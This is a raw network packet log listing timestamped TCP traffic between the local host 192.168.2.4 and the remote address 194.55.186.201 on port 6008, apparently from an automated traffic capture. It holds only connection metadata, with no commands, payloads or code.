Nov 3, 2022 12:45:24.808284044 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808376074 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808433056 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808466911 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808499098 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808612108 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808696985 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808712959 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808840036 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.808945894 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.808986902 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809132099 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809253931 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.809381008 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809438944 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809556007 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.809564114 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809716940 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809806108 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:24.809887886 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.809994936 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810200930 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810326099 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810450077 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810550928 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810648918 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810806036 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810931921 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.810956955 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811065912 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811204910 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811357975 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811434031 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811594963 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811796904 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811830044 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.811958075 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.812546015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.812608957 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.812625885 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828733921 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828774929 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828792095 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828804016 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828819036 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828864098 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.828898907 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829011917 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829253912 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829332113 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829612017 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829741001 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829766035 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.829890013 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830010891 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830097914 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830168962 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830249071 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830749989 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.830779076 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.831140041 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.831415892 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.831729889 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.832215071 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.832366943 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.832488060 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.832650900 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.832772970 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.833026886 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.833652020 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.833807945 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834011078 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834135056 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834206104 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834331036 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834815979 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.834940910 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835015059 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835094929 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835412979 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835530043 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835650921 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835767984 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.835936069 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836010933 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836172104 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836247921 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836370945 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836448908 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836585045 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836740017 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836812019 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.836889982 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837058067 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837172031 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837301970 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837498903 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837584972 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:24.837666988 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.318094015 CET	6008	49699	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.322669029 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.350055933 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.354604959 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.357532978 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.384958982 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.387109995 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.414340973 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.414418936 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.414455891 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.414704084 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.414704084 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.415986061 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.442282915 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442358017 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442436934 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442466974 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442547083 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442581892 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442610979 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442640066 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.442743063 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.442879915 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.470278978 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470355034 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470382929 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470402956 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470432997 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470489025 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470515966 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470603943 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470736980 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470854998 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.470980883 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.471196890 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.471220970 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.474925995 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.475105047 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.475182056 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.502218008 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502290010 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502326965 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502367973 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502397060 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502470970 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.502494097 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502573967 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.502576113 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.502649069 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.502649069 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.502688885 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503010035 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503098965 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503103018 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503181934 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503494978 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503556013 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503628969 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503716946 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503815889 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503843069 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.503921986 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.503979921 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.529834032 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.529875994 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.529968023 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530132055 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530247927 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530409098 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530601978 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530711889 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530821085 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530925035 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.530971050 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531069994 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531069994 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531090975 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531111956 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531111956 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531141043 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531172037 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531193018 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531213045 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531326056 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531330109 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531474113 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531557083 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531618118 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531691074 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531717062 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531825066 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531842947 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531902075 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.531922102 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.531980991 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532001019 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532033920 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532124996 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532222986 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532299995 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532362938 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532457113 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532533884 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532643080 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532787085 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532844067 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532882929 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.532933950 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.532979965 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533123970 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533195972 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.533224106 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533322096 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533382893 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.533416986 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533473015 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.533606052 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533704996 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533786058 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.533889055 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.533941984 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.534250975 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534414053 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534454107 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534540892 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.534579039 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.534598112 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534692049 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534764051 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.534837961 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.534966946 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535043955 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535067081 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535135031 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535166025 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535239935 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535262108 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535356045 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535419941 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535450935 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535590887 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535707951 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535732031 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535770893 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.535801888 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535945892 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.535999060 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.536031008 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.558103085 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558137894 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558186054 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558362007 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558381081 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.558482885 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.558698893 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558846951 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.558963060 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.559011936 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559173107 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559288979 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.559392929 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559418917 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559526920 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.559611082 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559812069 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.559905052 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.559942961 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560139894 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560226917 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.560259104 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560431004 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560534000 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560571909 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.560734034 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560810089 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.560817003 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560833931 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.560890913 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.561033964 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561058998 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561117887 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.561220884 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561302900 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.561438084 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561495066 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.561687946 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561846972 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.561929941 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.562083006 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.562199116 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.562275887 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.562398911 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.562516928 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.562587976 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.562743902 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.562812090 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.563039064 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563199043 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563313961 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563324928 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.563432932 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563513041 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563520908 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.563734055 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563812017 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.563885927 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.563982010 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564079046 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.564136982 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564194918 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564264059 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.564325094 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564404011 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564479113 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564488888 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.564555883 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564624071 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.564791918 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.564991951 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565093040 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565124989 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565184116 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565465927 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565521002 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565602064 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565643072 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565690041 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565732956 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565813065 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565860987 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.565907955 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.565953016 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.566028118 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566149950 CET	6008	49700	194.55.186.201	192.168.2.4
